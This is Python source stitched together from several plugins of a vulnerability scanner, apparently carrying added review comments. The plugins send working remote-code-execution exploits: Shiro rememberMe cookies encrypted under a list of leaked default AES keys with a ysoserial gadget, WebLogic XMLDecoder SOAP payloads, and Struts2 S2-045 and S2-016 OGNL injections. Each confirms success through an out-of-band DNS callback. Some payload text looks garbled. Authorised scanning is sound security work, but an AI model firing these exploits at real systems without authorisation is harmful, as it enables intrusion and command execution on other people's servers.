            ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)  # log the failure with the URL and plugin name
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Probe for the Shiro rememberMe deserialization issue (CVE-2016-4437) via a DNS callback.

    Args:
        Url: target URL; scheme, host and port are split out by UrlProcessing.
        RandomAgent: accepted for interface parity; not used in this body.
        proxies: proxy setting, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails.

    For each candidate key in ``CipherKey`` a ysoserial ``JRMPClient`` stream
    is PKCS#7-padded, AES-CBC encrypted under that key with a fresh IV, and
    sent as the ``rememberMe`` cookie.  A finding is recorded for the first
    key whose request produces a Dnslog lookup, after which the loop stops.
    Targets without outbound DNS will not be flagged.  Errors are handled
    per key.  Returns None.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    ExpClass = "JRMPClient"
    # Candidate rememberMe AES keys, base64-encoded.  NOTE(review): a few entries
    # (e.g. "ZWvohmPdUsAWT3=KpPqda", "CrownKey==a12d/dakdad") are not canonical base64;
    # whether b64decode accepts them depends on its non-strict handling — any decode
    # error is caught by the per-key except below and logged as a plugin error.
    CipherKey = [
        "kPH+bIxk5D2deZiIxcaaaA==",
        "2AvVhdsgUs0FSA3SDFAdag==",
        "3AvVhmFLUs0KTA3Kprsdag==",
        "4AvVhmFLUs0KTA3Kprsdag==",
        "5AvVhmFLUs0KTA3Kprsdag==",
        "5aaC5qKm5oqA5pyvAAAAAA==",
        "6ZmI6I2j5Y+R5aSn5ZOlAA==",
        "bWljcm9zAAAAAAAAAAAAAA==",
        "wGiHplamyXlVB11UXWol8g==",
        "Z3VucwAAAAAAAAAAAAAAAA==",
        "MTIzNDU2Nzg5MGFiY2RlZg==",
        "U3ByaW5nQmxhZGUAAAAAAA==",
        "fCq+/xW488hMTCD+cmJ3aQ==",
        "1QWLxg+NYmxraMoxAXu/Iw==",
        "ZUdsaGJuSmxibVI2ZHc9PQ==",
        "L7RioUULEFhRyxM7a2R/Yg==",
        "r0e3c16IdVkouZgk1TKVMg==",
        "bWluZS1hc3NldC1rZXk6QQ==",
        "a2VlcE9uR29pbmdBbmRGaQ==",
        "WcfHGU25gNnTxTlmJMeSpw==",
        "OY//C4rhfwNxCQAQCrQQ1Q==",
        "5J7bIJIV0LQSN3c9LPitBQ==",
        "f/SY5TIve5WWzT4aQlABJA==",
        "bya2HkYo57u6fWh5theAWw==",
        "WuB+y2gcHRnY2Lg9+Aqmqg==",
        "kPv59vyqzj00x11LXJZTjJ2UHW48jzHN",
        "3qDVdLawoIr1xFd6ietnwg==",
        "ZWvohmPdUsAWT3=KpPqda",
        "YI1+nBV//m7ELrIyDHm6DQ==",
        "6Zm+6I2j5Y+R5aS+5ZOlAA==",
        "2A2V+RFLUs+eTA3Kpr+dag==",
        "6ZmI6I2j3Y+R1aSn5BOlAA==",
        "SkZpbmFsQmxhZGUAAAAAAA==",
        "2cVtiE83c4lIrELJwKGJUw==",
        "fsHspZw/92PrS3XrPW+vxw==",
        "XTx6CKLo/SdSgub+OPHSrw==",
        "sHdIjUN6tzhl8xZMG3ULCQ==",
        "O4pdf+7e+mZe8NyxMTPJmQ==",
        "HWrBltGvEZc14h9VpMvZWw==",
        "rPNqM6uKFCyaL10AK51UkQ==",
        "Y1JxNSPXVwMkyvES/kJGeQ==",
        "lT2UvDUmQwewm6mMoiw4Ig==",
        "MPdCMZ9urzEA50JDlDYYDg==",
        "xVmmoltfpb8tTceuT5R7Bw==",
        "c+3hFGPjbgzGdrC+MHgoRQ==",
        "ClLk69oNcA3m+s0jIMIkpg==",
        "Bf7MfkNR0axGGptozrebag==",
        "1tC/xrDYs8ey+sa3emtiYw==",
        "ZmFsYWRvLnh5ei5zaGlybw==",
        "cGhyYWNrY3RmREUhfiMkZA==",
        "IduElDUpDDXE677ZkhhKnQ==",
        "yeAAo1E8BOeAYfBlm4NG9Q==",
        "cGljYXMAAAAAAAAAAAAAAA==",
        "2itfW92XazYRi5ltW0M2yA==",
        "XgGkgqGqYrix9lI6vxcrRw==",
        "ertVhmFLUs0KTA3Kprsdag==",
        "5AvVhmFLUS0ATA4Kprsdag==",
        "s0KTA3mFLUprK4AvVhsdag==",
        "hBlzKg78ajaZuTE0VLzDDg==",
        "9FvVhtFLUs0KnA3Kprsdyg==",
        "d2ViUmVtZW1iZXJNZUtleQ==",
        "yNeUgSzL/CfiWw1GALg6Ag==",
        "NGk/3cQ6F5/UNPRh8LpMIg==",
        "4BvVhmFLUs0KTA3Kprsdag==",
        "MzVeSkYyWTI2OFVLZjRzZg==",
        "CrownKey==a12d/dakdad",
        "empodDEyMwAAAAAAAAAAAA==",
        "A7UzJgh1+EWj5oBFi+mSgw==",
        "YTM0NZomIzI2OTsmIzM0NTueYQ==",
        "c2hpcm9fYmF0aXMzMgAAAA==",
        "i45FVt72K2kLgvFrJtoZRw==",
        "U3BAbW5nQmxhZGUAAAAAAA==",
        "ZnJlc2h6Y24xMjM0NTY3OA==",
        "Jt3C93kMR9D5e8QzwfsiMw==",
        "MTIzNDU2NzgxMjM0NTY3OA==",
        "vXP33AonIp9bFwGl7aT7rA==",
        "V2hhdCBUaGUgSGVsbAAAAA==",
        "Z3h6eWd4enklMjElMjElMjE=",
        "Q01TX0JGTFlLRVlfMjAxOQ==",
        "ZAvph3dsQs0FSL3SDFAdag==",
        "Is9zJ3pzNh2cgTHB4ua3+Q==",
        "NsZXjXVklWPZwOfkvk6kUA==",
        "GAevYnznvgNCURavBhCr1w==",
        "66v1O8keKNV3TTcGPK1wzg==",
        "SDKOLKn2J1j/2BHjeZwAoQ==",
    ]
    BLOCK_SIZE = AES.block_size
    # PKCS#7 padding: append N bytes each of value N, where N brings len(s) to a block multiple.
    PAD_FUNC = lambda s: s + ((BLOCK_SIZE - len(s) % BLOCK_SIZE) * chr(
        BLOCK_SIZE - len(s) % BLOCK_SIZE)).encode()
    AES_MODE = AES.MODE_CBC
    AES_IV = uuid.uuid4().bytes  # 16 random bytes, reused as the CBC IV for every key tried
    YsoserialPath = GetToolFilePath().Result() + "ysoserial.jar"
    for key in CipherKey:
        try:
            DL = Dnslog()  # fresh token per key so a hit can be attributed to that key
            # NOTE(review): popen is never wait()ed; stdout.read() drains to EOF but the child
            # is not reaped, and a non-zero exit (e.g. missing jar) yields an empty payload.
            popen = subprocess.Popen(
                ["java", "-jar", YsoserialPath, ExpClass,
                 DL.dns_host()],
                stdout=subprocess.PIPE)
            encryptor = AES.new(base64.b64decode(key), AES_MODE, AES_IV)
            file_body = PAD_FUNC(popen.stdout.read())
            # IV is prepended to the ciphertext so the receiver can recover it.
            base64_ciphertext = base64.b64encode(AES_IV +
                                                 encryptor.encrypt(file_body))
            payload_url = scheme + "://" + url + ":" + str(port)
            # The session-id cookie value is a fixed literal, not something obtained from the target.
            cookies = {
                "jeesite.session.id": "3f8a61ec-27e2-425c-9724-f96ba0c1e512",
                "rememberMe": base64_ciphertext.decode()
            }
            # verify=False disables TLS certificate validation for this request.
            requests.get(payload_url,
                         cookies=cookies,
                         proxies=proxies,
                         timeout=6,
                         verify=False)
            # NOTE(review): no sleep before DL.result() here, unlike the sibling plugins;
            # a slow callback may be missed.
            if DL.result():
                Medusa = "{}存在ShiroRememberMe反序列化命令执行漏洞(CVE-2016-4437)\r\n验证数据:\r\n漏洞位置:{}\r\n秘钥:{}\r\ncookie:{}\r\nDNSLOG请求值:{}\r\nDNSLOG数据:{}\r\n".format(
                    url, payload_url, key, cookies, DL.dns_host(),
                    DL.dns_text())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url,
                                     **kwargs).Write()  # record the target and the scan evidence
                WriteFile().result(str(url),
                                   str(Medusa))  # write to file: url is the per-target filename, Medusa the result text
                break  # first matching key is enough
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, _)
            ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                             e)  # log the failure with the URL and plugin name
def medusa(Url: str, RandomAgent: str, proxies: str = None, **kwargs) -> None:
    """Probe for WebLogic XMLDecoder deserialization (CVE-2017-10271) via a DNS callback.

    Args:
        Url: target URL; scheme, host and port are split out by UrlProcessing.
        RandomAgent: User-Agent value to send.
        proxies: proxy setting, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails.

    Two SOAP envelopes (a Linux and a Windows ``ProcessBuilder`` variant)
    are POSTed in turn to ``/wls-wsat/CoordinatorPortType``; each ends with
    ``ping`` against the same Dnslog host, and a finding is recorded whenever
    ``Dnslog.result()`` reports a lookup, so a target without outbound DNS
    will not be flagged.  Errors are handled per variant.  Returns None.
    """
    proxies = Proxies().result(proxies)
    scheme, url, port = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given

    DL = Dnslog()
    # ProcessBuilder argv: the command slot only carries a ping to the Dnslog host (the detection canary).
    linux_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.4.0" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>/bin/bash</string>
</void>
<void index="1">
<string>-c</string>
</void>
<void index="2">
<string>ping {}</string>
</void>
</array>
<void method="start"/></void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>'''.format(DL.dns_host())
    windows_data = '''<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
  <soapenv:Header>
    <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
        <java version="1.8.0_131" class="java.beans.XMLDecoder">
          <void class="java.lang.ProcessBuilder">
            <array class="java.lang.String" length="3">
              <void index="0">
                <string>C:\Windows\System32\cmd.exe</string>
              </void>
              <void index="1">
                <string>/c</string>
              </void>
              <void index="2">
                <string>ping {}</string>
              </void>
            </array>
          <void method="start"/></void>
        </java>
      </work:WorkContext>
    </soapenv:Header>
  <soapenv:Body/>
</soapenv:Envelope>
'''.format(DL.dns_host())
    # Both variants share one Dnslog token, so a hit from the first body is still
    # reported (again) on the second iteration; there is no break after a finding.
    for data in [linux_data, windows_data]:
        try:
            payload = '/wls-wsat/CoordinatorPortType'
            payload_url = scheme + "://" + url + ":" + str(port) + payload

            headers = {
                'User-Agent': RandomAgent,
                "Accept-Language":
                "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
                "Accept-Encoding": "gzip, deflate",
                "Content-Type": "text/xml",
            }
            # verify=False disables TLS certificate validation for this request.
            resp = requests.post(payload_url,
                                 headers=headers,
                                 data=data,
                                 proxies=proxies,
                                 timeout=6,
                                 verify=False)
            con = resp.text
            time.sleep(4)  # allow time for the out-of-band lookup to reach the Dnslog service
            if DL.result():
                Medusa = "{}存在WebLogicXMLDecoder反序列化漏洞(CVE-2017-10271)\r\n验证数据:\r\n漏洞位置:{}\r\n利用POC:{}\r\n返回数据包:{}\r\nDNSlog数据:{}\r\nDNSlog随机数:{}\r\n".format(
                    url, payload_url, data, con, DL.dns_text(), DL.dns_host())
                _t = VulnerabilityInfo(Medusa)
                VulnerabilityDetails(_t.info, url,
                                     **kwargs).Write()  # record the target and the scan evidence
                WriteFile().result(str(url),
                                   str(Medusa))  # write to file: url is the per-target filename, Medusa the result text
        except Exception as e:
            _ = VulnerabilityInfo('').info.get('algroup')
            ErrorHandling().Outlier(e, _)
            ErrorLog().Write("Plugin Name:" + _ + " || Target Url:" + url,
                             e)  # log the failure with the URL and plugin name
def medusa(Url,RandomAgent,proxies=None,**kwargs):
    """Probe for Struts2 S2-045 via an out-of-band DNS callback.

    Args:
        Url: target URL; scheme, host, port and path are split out by UrlProcessing.
        RandomAgent: User-Agent value to send.
        proxies: proxy setting, normalised through Proxies().result().
        **kwargs: forwarded to VulnerabilityDetails.

    An OGNL expression is carried in the ``Content-Type`` header of a POST to
    the URL's own path; the expression runs ``ping`` against the Dnslog host,
    and a finding is recorded only if Dnslog observed the lookup, so a target
    without outbound DNS will not be flagged.  Returns None.
    """
    proxies=Proxies().result(proxies)

    # NOTE(review): a 4-tuple is unpacked here while sibling plugins unpack 3 values from
    # UrlProcessing().result(); confirm which signature the project actually ships.
    scheme, url, port,path = UrlProcessing().result(Url)
    # Default the port from the scheme when the URL carries none.
    if port is None and scheme == 'https':
        port = 443
    elif port is None and scheme == 'http':
        port = 80
    else:
        port = port  # no-op: an explicit port is kept as given
    DL=Dnslog()
    con=""  # response body; stays empty if the POST itself fails
    try:
        # No fixed endpoint here: the request goes to whatever path the caller's Url carried.
        payload_url = scheme + "://" + url +":"+ str(port)+path
        # NOTE(review): the `[email protected]` fragment in the Content-Type literal looks
        # like an extraction artifact (e-mail obfuscation), not valid OGNL; the string as shown
        # cannot be assumed to match the project's original.
        headers = {
            'User-Agent': RandomAgent,
            "Accept-Language": "zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2",
            "Accept-Encoding": "gzip, deflate",
            "Content-Type":"%{(#nike='multipart/form-data').(#[email protected]@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='ping "+DL.dns_host()+"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}"
        }

        # Inner try: a timed-out or failed POST is swallowed so the DNS check below still runs
        # (original comment: avoid losing the finding when the POC hangs on Linux).
        # verify=False disables TLS certificate validation for this request.
        try:
            resp = requests.post(payload_url,headers=headers, timeout=6,proxies=proxies, verify=False)
            con = resp.text
        except:
            pass

        time.sleep(2)  # allow time for the out-of-band lookup to reach the Dnslog service
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-045)\r\n漏洞详情:\r\n版本号:S2-045\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,headers,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            VulnerabilityDetails(_t.info, url,**kwargs).Write()  # record the target and the scan evidence
            WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target filename, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# log the failure against the plugin name
def medusa(**kwargs)->None:
    """Probe for Struts2 S2-016 via an out-of-band DNS callback.

    Keyword args read: ``Url`` (target base URL, used as-is), ``Headers``
    and ``Proxies``; all kwargs are also forwarded to
    ``VulnerabilityDetails``.  A ``?redirect:`` query string holding a
    URL-encoded OGNL expression that runs ``ping`` against the Dnslog host
    is appended to the URL and fetched with GET; the finding is recorded
    only if Dnslog observed the lookup, so a target without outbound DNS
    will not be flagged.  Returns None.
    """
    url = kwargs.get("Url")  # target base URL supplied by the caller
    Headers = kwargs.get("Headers")  # caller-supplied request headers
    proxies = kwargs.get("Proxies")  # caller-supplied proxy settings
    DL=Dnslog()
    con=""  # response body; stays empty if the GET itself fails
    payload="""?redirect:%24%7B%23a%3D%28new%20java.lang.ProcessBuilder%28new%20java.lang.String%5B%5D%7B%27ping%27%2c%27{}%27%7D%29%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew%20java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew%20java.io.BufferedReader%28%23c%29%2C%23e%3Dnew%20char%5B500%5D%2C%23d.read%28%23e%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23d.read%28%23e%29%2C%23matt.getWriter%28%29.println%28%23e%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D""".format(DL.dns_host())
    try:
        payload_url = url+payload

        # Inner try: a timed-out or failed GET is swallowed so the DNS check below still runs
        # (original comment: avoid losing the finding when the POC hangs on Linux).
        # verify=False disables TLS certificate validation for this request.
        try:
            resp = requests.get(payload_url,headers=Headers, timeout=6,proxies=proxies, verify=False)
            con = resp.text
        except:
            pass

        time.sleep(2)  # allow time for the out-of-band lookup to reach the Dnslog service
        if DL.result():
            Medusa = "{} 存在Struts2远程代码执行漏洞(S2-016)\r\n漏洞详情:\r\n版本号:S2-016\r\n使用EXP:{}\r\n返回数据:{}\r\n返回DNSLOG数据:{}\r\n使用DNSLOG:{}\r\n".format(url,payload_url,con,DL.dns_text(),DL.dns_host())
            _t=VulnerabilityInfo(Medusa)
            # NOTE(review): if the inner GET raised, `resp` is unbound here and this line
            # raises NameError, which the outer handler logs as a plugin error.
            VulnerabilityDetails(_t.info, resp,**kwargs).Write()  # record the target and the scan evidence
            WriteFile().result(str(url),str(Medusa))# write to file: url is the per-target filename, Medusa the result text
    except Exception as e:
        _ = VulnerabilityInfo('').info.get('algroup')
        ErrorHandling().Outlier(e, _)
        # NOTE(review): if `url` or `_` is None the concatenation below raises inside the
        # handler and the TypeError escapes this function unlogged.
        _l = ErrorLog().Write("Plugin Name:"+_+" || Target Url:"+url,e)# log the failure against the plugin name